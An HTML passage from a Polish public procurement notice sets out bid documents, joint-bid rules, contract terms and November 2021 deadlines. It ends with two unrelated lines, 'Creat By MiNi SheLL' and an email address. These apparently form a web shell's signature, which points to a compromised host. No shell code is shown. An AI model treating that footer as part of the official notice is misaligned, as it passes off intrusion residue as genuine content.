wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>Zaleca się skorzystanie z druku stanowiącego załącznik nr 7 do SWZ.<br/>2. wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu<br/>wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami -<br/>potwierdzającego spełnianie warunku opisanego przez zamawiającego w pkt 7.2.2. Zaleca się skorzystanie z druku stanowiącego załącznik nr 8 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oświadczenia lub dokumenty składane razem z ofertą:<br/>1. dokumenty potwierdzające uprawnienie do podpisania oferty oraz do podpisania lub<br/>poświadczenia za zgodność z oryginałem składanych oświadczeń lub dokumentów. Jeżeli<br/>odrębne przepisy wymagają wpisu do rejestru lub ewidencji dokumentem właściwym jest odpis<br/>lub informacja<br/>z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej lub innego właściwego rejestru lub dokumenty na podstawie<br/>których dokonuje się wpisu do właściwego rejestru lub ewidencji,<br/>np. uchwała właściwego organu Wykonawcy;<br/>2. pełnomocnictwo, w przypadku, gdy ofertę lub załączone do niej oświadczenia lub dokumenty<br/>podpisuje pełnomocnik;<br/>3. dokument potwierdzający wniesienie wadium w przypadku wnoszenia wadium w formie niepieniężnej;<br/>4. oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału<br/>w postępowaniu, zgodny w treści z Załącznikiem nr 3 do SWZ, aktualne na dzień składania<br/>ofert, celem potwierdzenia, że Wykonawca nie podlega wykluczeniu z postępowania na<br/>podstawie art. 108 ust. 1 oraz art. 109 ust. 1<br/>pkt 4 ustawy Pzp oraz spełnia warunki udziału w postępowaniu określone<br/>w SWZ. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców,<br/>oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>5. Oświadczenie, zgodne w treści z Załącznikiem Nr 3 do SWZ, aktualne na dzień składania<br/>ofert, dotyczące innych podmiotów, na których zasoby powołuje się Wykonawca, celem<br/>wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim<br/>Wykonawca powołuje się na ich zasoby, warunków udziału w postępowaniu.<br/>6. dowód potwierdzający, że Wykonawca realizując zamówienie będzie dysponował<br/>niezbędnymi zasobami innych podmiotów, który stanowi<br/>w szczególności zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy<br/>niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienia, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów.<br/>Zobowiązanie podmiotu udostępniającego zasoby, potwierdza, że stosunek łączący wykonawcę<br/>z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz<br/>określa w szczególności:<br/>6.1. zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>6.2. sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>6.3. czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający, dopuszcza możliwość składania oferty przez dwóch lub więcej Wykonawców (w<br/>ramach oferty wspólnej w rozumieniu art. 58 ustawy Pzp) pod warunkiem, że taka oferta<br/>spełniać będzie następujące wymagania:<br/>1. Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego.<br/>2. Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z<br/>pełnomocnikiem, którego adres należy wpisać w Formularzu oferty.<br/>3. Pełnomocnictwo lub inny dokument (np. umowa konsorcjum, spółki cywilnej) z którego wynika<br/>takie pełnomocnictwo należy złożyć razem z ofertą.<br/>4. W odniesieniu do warunków określonych w pkt 7.2 SWZ, wymagania te muszą być spełnione<br/>wspólnie przez Wykonawców składających ofertę wspólną (nie musi ich spełniać osobno każdy z<br/>Wykonawców składających ofertę wspólną). Na ich potwierdzenie należy złożyć dokumenty określone w pkt 10.4 SWZ. 5. Każdy z Wykonawców wspólnie ubiegających się o zamówienie składa oświadczenie zgodne<br/>z treścią Załącznika Nr 3 do SWZ, aktualne na dzień składania ofert, celem potwierdzenia, że<br/>każdy z Wykonawców ubiegających się wspólnie o zamówienie nie podlega wykluczeniu z<br/>postępowania na podstawie art. 108 ust. 1 oraz art. 109 ust. 1 pkt 4 ustawy Pzp oraz spełnia<br/>warunki udziału w postępowaniu określone w SWZ w zakresie, w którym każdy z nich wykazuje<br/>brak podstaw wykluczenia z postępowania oraz spełnia warunki udziału w postępowaniu.<br/>6. Każdy z Wykonawców występujących wspólnie obowiązany jest do wykazania braku podstaw<br/>do wykluczenia z postępowania o udzielenie zamówienia publicznego. W takim przypadku<br/>oświadczenia lub dokumenty wymienione w pkt 10.3.1-10.3.4SWZ składa każdy z Wykonawców<br/>występujących wspólnie.<br/>7. Zamawiający nie zastrzega obowiązku osobistego wykonania przez jednego<br/>z Wykonawców kluczowych części zamówienia.<br/>8. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden<br/>spełnia warunek dotyczący posiadania uprawnień do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej, są zobowiązani dołączyć do oferty oświadczenie, z którego<br/>wynika, które roboty budowlane wykonają poszczególni wykonawcy.<br/>9. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są<br/>wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z<br/>którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Na podstawie art. 455 ust. 1 ustawy Pzp, Zamawiający informuje, że przewiduje możliwość zmian postanowień zawartej umowy w przypadkach określonych we Wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę oraz dokumenty lub oświadczenia składane razem z ofertą należy złożyć za pośrednictwem Platformy Zakupowej – pod adresem: https://przetargi.wody.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-22 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com